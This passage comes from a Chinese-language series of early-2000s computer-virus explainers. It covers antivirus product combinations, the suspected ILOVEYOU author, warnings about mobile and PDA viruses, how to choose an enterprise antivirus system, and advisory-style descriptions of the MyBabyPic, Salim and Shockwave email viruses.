2.McAfee5.13+KILL。作为曾是国内杀毒权威认证形象的KILL,其在技术层面上不输于国内任何一家对手,况且CA的技术实力我们应当可以充分信赖。KILL在国内建立的病毒监视小组和CA遍布全球的40多家类似机构应该可以给您充足的安全感。事实上,在随系统开启McAfee实时监控的情况下,病毒入侵这一组合的可能性已经非常小了。经测试,无论是开启KILL还是McAfee的实时监控,都不会与系统发生冲突。
3.PC-cillin2001+KV3000。这又是一对黄金组合。PC-cillin2001公认的最大优势是其对以网络为载体的病毒和恶意JAVA和ActiveX程序的查杀;而KV3000拥有很好的DOS性能,一旦中招,还可利用KV3000转移阵线,在DOS下再与病毒决一雌雄;还有KVW3000庞大的病毒样板库、优越的实时监控性能也会让您安全感倍增。建议使用KVW3000的实时监控程序。这对组合经过长达4个月的测试,未发现与系统或其他软件冲突。
计算机病毒小知识速查系列十二
“我爱你”病毒创造者自白
菲律宾辍学生古兹曼(Guzman)因创造了历史上破坏力最强的计算机病毒“我爱你(Love Bug)”而名扬世界。
他说,“我承认我创造病毒,但我不知道‘我爱你’病毒是不是我创造的病毒之一。”“如果能知道源代码(source code),我可以查查看,也许是别人栽赃陷害,或是从我这里偷走的。”
24岁的古兹曼明白,在信息时代,名气转瞬即逝。菲律宾一所计算机学校的这名辍学生,想在“我爱你”病毒的恶名还没有被世人遗忘前,让全世界都知道他是一名技术高超的黑客,一名能瘫痪个人计算机的“指挥官”。不过,古兹曼要小心法律制裁。虽然到目前为止“我爱你”是不是他所创造的仍难以下结论,但事实上,从美国国防部到英国国会,几乎所有机构都没有逃脱“我爱你”的毒手,这个病毒瘫痪全球计算机所造成的损失约达100亿美元。在许多国家,古兹曼即使坐一辈子牢也难以洗清其罪名。
菲律宾当局以盗窃及其它罪名起诉古兹曼,但在去年8月份因证据不足而撤销。古兹曼没有受到法律制裁的另一个原因是“我爱你”病毒在去年5月爆发时,菲律宾还没有制裁计算机黑客行为的相关法规。
不过,菲律宾总统艾斯特拉达已在去年8月14日签署了电子商务法,古兹曼也陷入了两难境地:一方面他想承认是自己创造了“我爱你”病毒,这样他可以利用这项“荣耀”赚钱,另一方面在接受记者采访时,紧守不承认创造“我爱你”病毒的原则,因为他担心会再次吃上官司。
在辩护律师的陪同下,古兹曼说,全世界计算机天才多的是,“但我认为我已是菲律宾历史的一部分,不能被抹煞。”
古兹曼说他已不再非法入侵别人的计算机,但他仍在练习“破译”密码。他说,他使用这种技术从因特网下载软件而不必付费。
古兹曼并不认为用这种方式偷窃软件是“偷”,就像他对计算机病毒所造成的损害从未在良心上受到谴责一样。他说,软件公司,特别是微软,要为“我爱你”所产生的灾难负责,因为他们在知情的情况下销售易遭攻击的产品。
古兹曼说,“我是消费者,我购买这种产品,只是我的使用方式有问题或不恰当,但这都是我自己的事,为什么要指责我?”
业内人士指出,这种与道德无关的论调是计算机黑客的典型反应,不管他们是住在鳞次栉比的马尼拉住宅区,还是硅谷高级住宅区。
事实上,仅仅在2000年春天以前,古兹曼还是个泛泛之辈,为获得技术学院的计算机学位而苦苦挣扎。5月4日,一封名为“我爱你”的电子邮件突然出现在亚洲的计算机上,只要一打开,就会销毁图形及其它文档。这个电子邮件程序会通过计算机中的数据库自我复制,迅速传送给地址簿中所有的联络人。不过数小时,欧美地区从新闻工作者、经纪商到政府机关无一幸免。
古兹曼回忆说,当时他在家睡觉,当他醒来听到这一新闻时,一点都没有觉得与自己有关。
马尼拉一下子成了全球追捕病毒作者的重点地区。经过一番追查后,警方证实古兹曼是头号嫌疑犯。一开始,古兹曼说他可能在无意间释放出了病毒;但现在,他说他不知道病毒是怎么跑出去的。
在被当成嫌疑犯后,古兹曼有好几个礼拜躲在他母亲家。几次冒险跑出来,发现大家对他指指点点后,便开始整天窝在家里的沙发上,玩索尼推出的Play station。
因为发生了这一事件,古兹曼在求职时,一度令计算机公司闻之色变。现在风头已过,古兹曼终于找到了一份工作。他说,微软的Outlook软件是传播病毒的主要工具之一,如果微软提供不错的条件,他愿为微软工作。
计算机病毒小知识速查系列十三
短消息接收也会传播手机病毒
横行互联网的计算机病毒下一个入侵目标是手机和移动上网设备(PDA),最终侵入上网电视和其他上网家电。这是亚洲反病毒大会(AVAR)昨天透露的信息。昨天是AVAR的最后一天,会议重点讨论了计算机病毒的未来发展趋势和应对策略。与会者普遍关注手机病毒的发展进程和解决方案,目前,已出现通过短信息发布来传播病毒的手机概念病毒。所谓概念病毒是指已经实现潜伏、传播、感染和破坏等病毒特性的病毒雏形。一旦用户接收到带有病毒的短信息,阅读后便会出现手机键盘被锁死的现象,以后可能出现破坏手机内存储的信息,直至彻底破坏手机IC卡等恶性手机病毒。
应对手机病毒目前主要的技术措施有两种:其一是通过无线网站对手机进行杀毒;其二是通过手机的IC接入口或红外传输口进行杀毒。另据了解,应AVAR协会的邀请,中国专业反病毒公司北京瑞星公司正式成为AVAR协会会员,这是我国拥有完全自有知识产权的反病毒公司第一次加入国际性的反病毒组织。
计算机病毒小知识速查系列十四
专家警告新病毒无WAP不摧
澳大利亚一家互联网安全机构日前警告说,病毒高手很有可能正在编写一种妨碍新一代手机正常工作的病毒,这种病毒将以WAP技术为破坏目标,使手机用户在接受上网服务时产生麻烦。
这一由澳大利亚电脑紧急反应小组发出的警告源自一份在澳大利亚国内流行的恶作剧电子邮件,这份电子邮件谎称目前一种手机病毒正在传播,它可以妨碍用户接入网络,而且可以通过贮存在手机内的电话薄传播给他人的手机。
对此位于澳大利亚昆士兰大学的小组发言人马克-麦克帕森指出:“尽管没有迹象表明大规模的手机病毒将要爆发,但我们认为黑客在新兴的无线手机领域编写新的病毒一点也不令人奇怪。”
据悉目前针对掌上电脑的病毒已于今年早些时间被发现,这种病毒在用户利用掌上电脑玩任天堂游戏时被启动,它能够破坏掌上电脑所存贮的数据。9月份,一种名为Phage的掌上电脑病毒也悄然露面,它具有更大的破坏性,可在程序之间传播也可通过用户共享软件中传播给其它的掌上电脑。
计算机病毒小知识速查系列十五
您的PDA需要反病毒软件保护吗?
说起计算机病毒和反病毒之间的斗争,很多朋友都会认为那只有台式计算机和便携式笔记本电脑才会感染计算机病毒。确实如此,传统的计算机病毒主要寄生和感染台式PC机,或者通过INTERNET来传播。很少人听说PDA(个人数字助理)这样的手持式的无线通讯数字产品也会受到计算机病毒的威胁。
但目前随着PDA和WAP的飞速发展,计算机专家正在进行PDA是否正在受到病毒威胁和是否需要特别的反病毒软件来保护的问题。专家认为,PDA由于经常需要和台式PC机进行资料同步交换,而PC机上的Word 或 Excel 文档很容易感染宏病毒。如果是在大公司的局域网里,这种现象更为严重。局域网中只要有一台计算机感染计算机病毒,那么整个网络都将十分的危险。PDA使用的操作系统比如WINDWOS CE是和普通台式PC机基本上有着同样的数据处理能力。而专门为PDA设计的应用软件中亦有能处理EXCEL或WORD文档的功能。这意味着PDA只要和感染病毒的台式PC机进行资料同步,那么PDA很可能就和PC机一样受到病毒的感染,甚至病毒会在PDA中发作。所以有专家形象的把感染病毒的PDA比喻成“一张塞在PC机软驱里的感染病毒的软磁盘”。“一个在公司局域网里流动的炸弹”。由此可见,PDA正在受到病毒的威胁,保护PDA的数据安全已经是一个十分重要的问题。
幸运的是,国际著名的反病毒软件公司Network Associates已经于8月21日宣布推出基于保护PDA的新型防病毒软件。这种新型的防病毒软件被成为McAfee VirusScan Handheld。根据Network Associates的资料表明,McAfee VirusScan Handheld主要是用于个人数字助理PDA和其他手持式电脑的安全防护,McAfee VirusScan Handheld是为了帮助大公司处理和保护日益增长的数字移动用户的数字产品的数据安全而设计的。
McAfee VirusScan Handheld是一个应用软件,它能安装在用户的台式PC机和与其交换资料的PDA上。McAfee VirusScan Handheld的反病毒原理基本上和传统的McAfee VirusScan 一样,通过扫描,监视台式PC机和PDA的资料同步来判断电脑是否感染病毒。也可以作为台式PC机向PDA传送资料的病毒过滤器。McAfee VirusScan Handheld能对付各种已知的规则的文件类型,一般计算机病毒经常感染寄生的文件都能被McAfee VirusScan Handheld检测。
计算机病毒小知识速查系列十六
新病毒时代
与新经济学家相比,病毒更有理由成为网络时代的宠儿,这是因为:第一,病毒具有更强的表现欲和活动能力;第二,事实证明,病毒能更好地实践互联网速度,从而更加有效地利用整个互联网。
用户:都是网络惹的祸
令人胆战心惊的病毒警报最近再度响起,对象是那些借网络之风日渐流行的掌上电脑。与前一阵沸沸扬扬的手机病毒不同,这一次不再是纸上谈兵,据称,不少用户已经遭遇到了这种被称为Palm.Liberty.A的病毒,趋势科技等公司先后在网上公布了程序代码,让用户及时下载,以查杀这一全新病毒。Palm.Liberty.A病毒的出现,标志着我们迈入一个全新的病毒时代。
一切光荣归于互联网,一切危害也来自于它。网络对于病毒是如此的钟爱,让我们先来看看下面这一组数字:1999年上半年,通过Internet传播的四种病毒(happy99、CIH、Melissa、ZIP-explorer)造成了76亿美元的巨额损失。这一数字是此前4年所有病毒造成损失的总额。然而这并不算什么,病毒总是喜欢挑战自我,一句“ILOVEYOU”横扫互联网,在短短的数天之内,爱虫自己就创下了65亿美元损失的空前纪录。
病毒是寄生于速度的物种,只有速度才能赋予它巨大的能量,因此,网络理所当然地成为了病毒的最佳伴侣。在CIH病毒之前,笔者很少为媒体上炒得热热闹闹的病毒发愁,因为那时主要的传播介质就是软盘,即使是流行病毒,从国外传进国内一般也需要几个月的时间。而且,只要用户记住在使用软盘时,先进行病毒扫描,就可以在很大的程度上避免病毒的感染。
现在,网络使病毒得到了前所未有的进化,生出翅膀的病毒迫不及待地向人们展示,什么才是互联网的速度。还记得那个“Melissa”吗,这个“小姑娘”在病毒家族中率先完成了自己的“互联网转型”。1999年3月26日,Melissa从制作者的电脑出发,短短的17个小时之内,在300多家企业,至少10万台电脑上留下了自己的足迹。不过,后来出现的爱虫病毒很快使得这一成绩黯然失色。
在运动中破坏,在运动中繁殖。这就是病毒生存的哲理。1999年以前,全球病毒总数约18000种,而2000年还未过完,这一数字已经突破40000种。当时的爱虫病毒,就曾经在一天之内,产生了数十个变种。在您阅读本文的时候,可能又有一群病毒爬上了网络,开始了它们的速度之旅。
当病毒爱上网络,我们又能做些什么呢?
反毒公司:你是风儿,我是沙.....
“你是风儿,我是沙,缠缠绵绵到天涯......”。这句歌词是病毒和反毒公司之间关系的最好诠释。病毒恨反病毒公司吗?是的。反病毒公司爱病毒吗?答案同样是肯定的。如果说网络与病毒是最亲密的伴侣,那么病毒与反病毒公司就是一对欢喜冤家。
有了病毒,才有了反毒公司腰袋中鼓鼓的钞票。借助病毒的“恐吓”,反毒软件McAfee的股票首日上市就上涨了三倍,从那些被病毒吓得心惊肉跳的用户手中,共“敲诈”到了20.4亿美金。这次掌上电脑病毒的出现,更是使各大反毒厂商兴奋不已,透过这只病毒,厂商们看到了一个远未开发的巨大金矿,那就是掌上设备与信息家电的安全防护。各厂商争先恐后地推出自己的解决方案,惟恐在这块新兴的市场上落后一步。
病毒肆虐之时,正是反毒厂商大发横财的日子,这听起来让人颇感别扭,难怪有人甚至怀疑,不少病毒就是那些反毒公司制造的。但凭心而论,用户与反病毒软件公司的关系,就像病人与医生的关系,医生不能为了利益希望别人多生病,病人也不能因为付出了金钱就产生怨恨。在网络时代,医生与病人这种关系,更应该由于病毒的猖獗而紧密相连。为了追逐病毒越来越快的脚步,反毒公司也别无选择地爱上了网络。通过互联网,各公司的反病毒中心可以以最快的速度,对全球范围内新出现的病毒做出反映。此外,通过收取会员费的方式,在互联网上提供反毒服务,也成为反毒公司的一条财路。以McAfee为例,它的网站向会员收取49.95美元的年费。不到三个月的时间,登记为会员的用户就达到了12,800名,他们来自世界230个国家。网络造就了全球化的病毒,网络也造就了全球化的反毒公司。
病毒爱上网络,反病毒公司也爱上了它,随着网络的不断发展,这一对冤家的恩爱厮杀就演绎出了全新的病毒时代。
病毒:我的明天更美好
对未来的世界,你会有什么样的想象呢?也许一切已经被媒体描绘得令人向往:在家中,你悠闲地躺在沙发上,观看宽带互动电视。没有什么家务事让你操心,屋里的一切都是可以上网的智能化产品,从冰箱、烤面包机到你脚下穿的球鞋。出门时,乘坐的汽车具有卫星导航系统和多媒体互动装置,在车上,你可以随时浏览新闻,收取Email。至于那些恼人的机械故障,你完全不必担心,车上配备的智能系统会把一切微小的故障在发生前通知修理站,在你毫不查觉的情况下,所有问题都被解决得干干净净。
但在这幅高科技描绘的美好图画中,还缺少了一样东西,那就是病毒。它是网络名副其实的亲密爱人,我们越接近网络,就越有机会碰上它的身影,当我们完全陷入网络之中时,病毒甚至是致命的。这绝不是危言耸听,试想一下,在你驾驶的途中,汽车的智能系统突然因为病毒失灵会造成什么样的后果?
当然,过度的恐惧也是不必要的,从目前出现的病毒来看,大多数只是通过PC作用于信息设备,而不是直接感染它们,换句话说,它们的寄生与传播,主要还是依赖于PC操作系统。基于现在的技术水平,谈纯粹的手机和信息电器的病毒还为时过早。不过,专家们也指出,天真地以为这类情况不会发生的态度无疑也是错误的。从理论上讲,任何具备内存并且依赖软件代码运作的设备都有可能成为恶意攻击的目标。
以这次的Palm掌上电脑病毒为例,该程序据称实际上是Palm公司的瑞典程序员Aaron为了检测设备而开发的。据他介绍,此程序的主要用途是对Palm手持设备进行初始化的工具。在接受国外媒体电话采访中,他说:“我开发了一个叫‘清洁工’的Palm程序。该程序能够找出过时的数据库并清除他们,目的是重新恢复一个干净的环境”。但现在,该程序被改成了一个典型的特洛伊木马,并被装扮成“掌上型游戏软件”供人下载,同时以该游戏Crack1.1版本之名,经由“网络接力聊天”系统传播。此病毒软件发作时,掌上电脑内的所有档案将被抹掉。
为了吸引用户,厂家围绕信息设备的应用竭尽心智,新产品深入到人们饮食起居的每个环节,但安全性却常常被忽略。由于这些设备大多数都是基于软件的智能产品,而且可随时通过网络升级,这无疑给病毒的侵入造成了绝佳的机会。NetworkSecurityTechnologies的高级工程师Smith评价说:“当高级的应用使用低级的安全控制,那么什么可怕的事情都可能发生。可以确信,不远的将来,PC将决不是唯一受到病毒攻击的目标。”
“明天将更加美好。”病毒这样想,反毒公司也这样想。但是我们呢?
计算机病毒小知识速查系列十七
选择防病毒系统的七点注意
如何选择一个好的防病毒系统是许多人困惑的,这里我们就以NAI公司的McAfee AVD (Active Virus Defense)网络防病毒系统为例进行讨论。
注意一,产品体系要完整、检测率要高
一个好的防病毒系统应该能够覆盖到每一种需要的平台。我们都知道,病毒的入口点是非常多的。在一个具有多个网络入口的连接点的企业网络环境中,病毒可以由软盘、光盘等传统介质进入,也可能由电子邮件、网络服务器等进入,还有可能从外部网络中通过文件传输等方式进入。病毒可能的入口点如图1所示。
在图1中标出的入口点处,任何一点没有部署防病毒系统,对整个网络都是一个安全的威胁。比如一个木桶由很多块木板拼成,该木桶的容量就取决于最矮的那块木板的长度,而不是最高的。所以,我们一般需要考虑在每一种需要防护的平台上都部署防病毒软件。它大体上分为以下几类平台:客户端、邮件服务器、其他服务器、网关。
以NAI为例,它针对邮件服务器和群件服务器以及网关防病毒,提供了Groupshield和Webshield两种解决方案。其中Groupshield是基于Microsoft Exchange 和 Lotus Notes 群件服务器的防病毒保护解决方案。同Netshield 一样,GroupShield 提供了强大的管理功能,控制所有文件、应用程序并执行远程服务、安装与配置。强大的集中警告功能可以通过电子邮件、打印机、寻呼机、DMI警告或网络消息,传送各种病毒警告给携带病毒邮件的寄件人、收件人和系统管理员。而对于基于SMTP的邮件服务器,NAI提供了Webshield SMTP防病毒系统,它可以形成一个病毒过滤前置机,完全能够适用于任何类型的SMTP邮件服务器,而不管该服务器采用何种操作系统和邮件服务器版本。而且,用户可以针对邮件的标题以及正文设置内容过滤策略,杜绝不正当信息的流通。
注意二,软件控制台功能要完善
为了方便集中管理,防病毒软件控制台首先需要解决的就是管理容量问题。也就是每一台控制台能够管理到的客户机的最大数目。另外,对于一个企业内部的不同部门,我们有可能需要设置不同的防病毒策略,比如一些关键的业务部门服务器和计算机,我们需要每当有新的病毒特征码就尽快升级;但是对于一些非关键业务部门的计算机,我们可以考虑时间稍长再升级一次;对于白天比较繁忙的服务器,我们可以将病毒特征码升级安排在晚上自动进行。一个好的控制台应该允许管理员按照IP地址、计算机名称、子网甚至NT域进行安全策略的分别实施。
在这方面NAI有两种控制台可供使用:一种称为ePO ( ePolicy Orchestrator),是一种大规模、企业级的防病毒控制台;另外一种称为ME (Management Edition),是一种适合在小规模网络中使用的控制台。两种控制台都能够进行防病毒软件的分发和升级,用户可以根据需要选用两种产品。
注意三,通过广域网管理的流量要尽量少
在一个需要通过广域网进行管理的企业中,由于广域网的带宽有限,防病毒软件的安装和升级流量问题也是必须要考虑到的。NAI的做法是:首先,自动升级功能允许升级发生在非工作时间,尽量不占用业务需要的带宽;其次, 利用AVD瘦客户端技术产品VirusScan TC,它专用于部署在大型企业中的客户机上的产品,大小仅有传统防病毒软件的三分之一;另外,对于必须频繁升级的特征码,NAI AVD采用了一种增量升级方式的选项,将传统的1M以上的特征码压缩到了100K左右。
注意四,报表功能要方便易用
一个网络中的病毒活动状况对于网络管理员来说是非常重要的,通过了解网络中的病毒活动情况,网络管理员可以了解哪些病毒活动比较频繁、哪些计算机或者用户的文件比较容易感染病毒以及发现的病毒的清除情况等等,以便修改病毒防范策略以及了解病毒的来源情况,方便进行用户、文件资源的安全管理。实用、界面友好的报表是一个网络防病毒软件必备的功能。如图2所示。
注意五,对计算机病毒要有实时防范能力
传统意义上的实时计算机病毒防范是指防病毒软件能够常驻内存,对所有活动的文件进行病毒扫描和清除。由于病毒活动频繁,再加上网络管理员一般都工作忙碌,有可能会导致病毒特征码不能及时更新。这就需要防病毒软件本身能够具有一定程度的未知病毒识别能力,一旦防病毒软件发现一个文件可能携带病毒,它应该有能力提供一种解决方法对该文件进行处理,以免系统或者文件受到未知病毒的破坏。另外,病毒一般都经常存在一个爆发期,比如2000年元旦,在这个爆发期内,计算机病毒防范系统应该能够依据具体情况自动进行报警、策略修改或者更新特征码等工作,以免影响进一步扩大。
NAI AVD具有一种自动免疫的功能,启用该功能后,防病毒软件就可以对未知病毒进行判断,并且如果怀疑某个文件携带病毒,它就会自动提取病毒样本,发送给NAI设立在全球各地的病毒研究小组,并且如果小组确认是病毒的话,就会马上作出响应。
此外,NAI AVD还具有防止病毒爆发引起损失的功能,叫做Outbreak管理器。该管理器可以运行在邮件防病毒系统和网关防病毒系统上。管理员可以预先定义策略,如当在10分钟内发现100个美丽莎病毒在网上传播,就采取特定行动,如给管理员发送呼机或电子邮件告警;再过10分钟又发现100个该病毒,则采取进一步行动如更改扫描频率,启动自定义扫描对关键文件进行检查;再进一步可以完成更新病毒特征码等工作,如果病毒爆发发生在预定义的非工作时间,该管理器甚至可以暂时停止邮件的转发,阻止病毒的蔓延。如图3所示。
注意六,病毒特征码升级要快速及时
反病毒软件如果没有即时升级就达不到进行病毒防范的目的。所以,能够提供一个方便、有效和快速的升级方式是防病毒系统应该具备的重要功能之一。NAI的防病毒特征码的升级一般每星期一到两次,在病毒多发期甚至能够达到每5分钟更新一次特征码。如此频繁的更新如果让每一个用户手动进行是不现实的,AVD 提供了几种不同的升级方式:
1. 用户自定义升级策略,让软件到指定时间后自动到Internet或本地文件服务器进行特征码更新。
2. 管理员在控制台发出强制升级指令,对一个或多个防病毒管理组中的计算机进行统一升级。
3. 升级特征码在网络上共享,由用户分别升级。
在一个大型的企业中,由于管理员工作繁忙,可能无法经常上网检查防病毒软件的更新情况,从而有可能无法及时得到升级信息。对此,NAI提供了一种工具和服务,叫做SecureCast,管理员可以利用该服务一天24小时自动地从NAI服务站点上得到最新的软件版本更新和特征码更新信息,包括自动下载需要更新的特征码文件。这一切都不需要管理员的任何手工干预!如果配合ePO的自动分发功能,管理员甚至无须动手就可以完成即时升级工作。
注意七,研发能力和技术支持力量要强
NAI公司是全球最大的专业从事网络安全的厂商,其防病毒产品具有雄厚的用户基础和市场份额。它具有一个分布全球近20个国家的反病毒紧急响应小组(AVERT),可以快速对病毒事件进行响应。不管病毒在何时何地爆发,NAI总能够提供最新的病毒信息和处理方案。
综上所述,目前的防病毒工作的意义早已脱离了各自为战的状况,技术也不仅仅局限在单机的防病毒。目前,如果需要对整个网络进行规范化的网络病毒防范,我们就必须了解最新的技术,结合网络的病毒入口点分析,很好地将这些技术应用到自己的网络中去,形成一个协同作战、统一管理的局面。这样的病毒防范体系,才能够称得上是一个完整的、现代化的网络病毒防御体系。
计算机病毒小知识速查系列十八
看似淫秽漫画,实是爱虫病毒变种
一种“爱虫”病毒的新变形于本周二开始四处传播。这种病毒名叫“MyBabyPic”,看上去非常像一个通过电子邮件转发来的淫秽漫画。
这种病毒仍然是通过电子邮件传播(只能通过Outlook传播),附件是一个采用Visual Basic语言编写的可执行文件——MyBabyPic.EXE。邮件的主题栏写着“My baby pic !!!”,邮件的正文是“Its my animated baby picture !!”。
如果接收者打开附件,将会看到一张婴儿的动画图片。这个还睡在婴儿床中的婴儿却长有一个成年人尺寸大小的阴茎,而且,动画效果还会使阴茎出现在两个不同的方位。这张图片可能会鼓励接收者将其转发给其他互联网用户,就好像传播一个淫秽漫画一样。
但实际上,如果打开了附件,这种病毒就会在本地的文件系统中进行自我复制,并在大约10分钟后向Outlook地址簿上的每一个地址发出一封电子邮件。这种病毒还会生成一组文件,并加入到Windows系统注册表的启动部分,每当被感染的电脑启动一次,它就会自动执行一次。
据称,这种病毒拥有非常危险的有效载荷,能轻易删除被感染电脑上的数据。根据目前的时间和日期,它还可以激活/关闭键盘上的NumLock,CapLock和ScrollLock键;可以向键盘缓冲发出“.IM_BESIDES_YOU_”信息,并发送不同的文本信息。
此外,这种病毒还可以破坏以VBS,VBE,JS,JSE,CSS,WSH,SCT,HTA,PBL,CPP,PAS,C,H,JPG,JPEG,MP2和MP3等为扩展名的文件。
计算机病毒小知识速查系列十九
在线聊天当心“萨利姆”病毒
最近一个通过映射驱动器和在线聊天系统传播的“萨利姆”(W97M/Salim.A)病毒被冠群金辰的全球病毒监测网发现。据了解,W97M/Salim.A是一个宏病毒和通过在线聊天系统传播的蠕虫,除了在ThisDocument模块中写入病毒代码外,它也在传播过程中截取文档内容。
“萨利姆”蠕虫依靠文档事件处理程序来运行,当一个已感染的文档被打开时,宏病毒就被激活,当染毒文档被关闭时,病毒的Document_Close宏将开始运行。与其它宏病毒不同,它并不使'宏病毒保护选项'失效,因此宏报警仍将显示。它在通用模板中执行一个'am I here'的检查,比较它的ThisDocument中第一行代码是否匹配'PIJAVICA;如果不匹配,所有在通用模板的ThisDocument对象中的原代码将被删除,病毒的原代码将从目前文档插入目标对象。
之后,“萨利姆”病毒将尝试感染当前被Word打开的所有文档。然而,这种尝试将由于一个错误而失败。病毒将在C盘根目录生成文件Salim_se.doc和Win32Drv.doc,这两个文件是带有宏病毒代码的激活文档的两个复制文件。这两个文件含有激活文档的内容,能将敏感信息暴露给不被期望的浏览者。Salim_se.doc的一个副本也会在每个映射驱动器生成。
如果在一个已感染的系统中存在目录"C:\MIRC",Script.ini文件将被创造或被覆盖,以使C:\Salim_se.doc能通过在线聊天系统送出。
计算机病毒小知识速查系列二十
手机病毒欲乘Java强势而来
日前在东京举行的电脑病毒国际会议“AVAR 2000”上,多位专家都对于“手机病毒”发出了警告,虽然目前还没有关于手机感染病毒的报告。不过,据说今后随着在手机中附加Java功能的增多,将有可能出现手机病毒。
在举行会议的第2天,由AVAR成员、Symantec的SARC经理星泽裕二做了有关移动式终端--尤其是手机病毒的讲演。
目前,手机还不能执行由用户等编写的程序。因此还没有手机病毒。今年6月份有人提出过关于与手机有关联的病毒“TIMOFONICA”的病毒报告。不过,该病毒只是向手机发送电子邮件的病毒,只能在个人电脑上感染及发作。然而,据说伴随着配备Java功能的i模式手机的登场,情况将会发生很大的变化。
芬兰的F-Secure的反病毒研究经理Mikko Hypponen也发出类似的警告。
“目前已经出现了在PDA上运行的病毒。这就是在9月份发现的Palm病毒‘Phase'。如果手机功能越来越多,同样也会出现手机病毒。我曾经听说某个制作病毒的集团宣布要制造手机病毒的消息”。
“如果手机可以执行程序的话,肯定能够制造出在该平台上运行的病毒。但是也不能因此就'不给手机追加功能'。对于用户来说,没有什么比提高功能更为重要的了”。
计算机病毒小知识速查系列二十一
病毒佯披Flash外衣
趋势科技12月1日发布一级病毒警讯,一只名为”TROJ_SHOCKWAVE.A"的新病毒,1日凌晨透过电子邮件大量散播,并在美国传出数起感染灾情。该病毒属于特洛依木马型(Trojan)病毒,以夹带着”CREATIVE.EXE"档案的电子邮件进行散播(如图一),使用者中毒后,病毒会将自己寄给使用者Outlook通讯录里的所有名单,自动对这些邮件地址发送垃圾邮件。信件主旨为:”AgreatShockwaveflashmovie",信件内容“CheckouthisnewflashmoviethatIdownloadjustnow...It'sGreat."。
该病毒最特殊之处,在于以Flash档来吸引电脑使用者开启,趋势科技技术支援部经理林锦忠强调:「近年来,愈来愈多的电子贺卡、卡通、游戏及广告改以Flash来表现,网友间分享动画档的情况也相当普遍。这就成为TROJ_SHOCKWAVE.A病毒作者所期待希望多媒体迷会在无意开启病毒附带档。」 趋势科技呼电脑使用者收到以上信件主旨或夹带着”CREATIVE.EXE"档案的电子邮件,请直接删除,不要开启。趋势科技美国分公司已接获数起客户感染报告,该公司表示,TROJ_SHOCKWAVE.A病毒已在外散播(inthewild),趋势科技产品可侦测该病毒。
趋势科技eDoctor病毒实验室分析,当使用者收到带有病毒的电子邮件,在不知情的状况下执行该附带档,电脑随即中毒。病毒会将自己寄给使用者Outlook通讯录里所有的名单,自动对这些邮件地址发送垃圾邮件,同时夹带病毒档案CREATIVE.EXE。病毒会寻找使用者硬碟中所有*.JPG,*.ZIP档案,将其移往C:\root资料夹,更改档案附档名,增加下列文字“changeatleastnowtoLINUX",例如:XXXX.ZIP变成“XXXX.ZIPchangeatleastnowtoLINUX"。病毒会在C:根目录下加入messageforu.txt文字档,纪录所有被搬移档案的原始位置。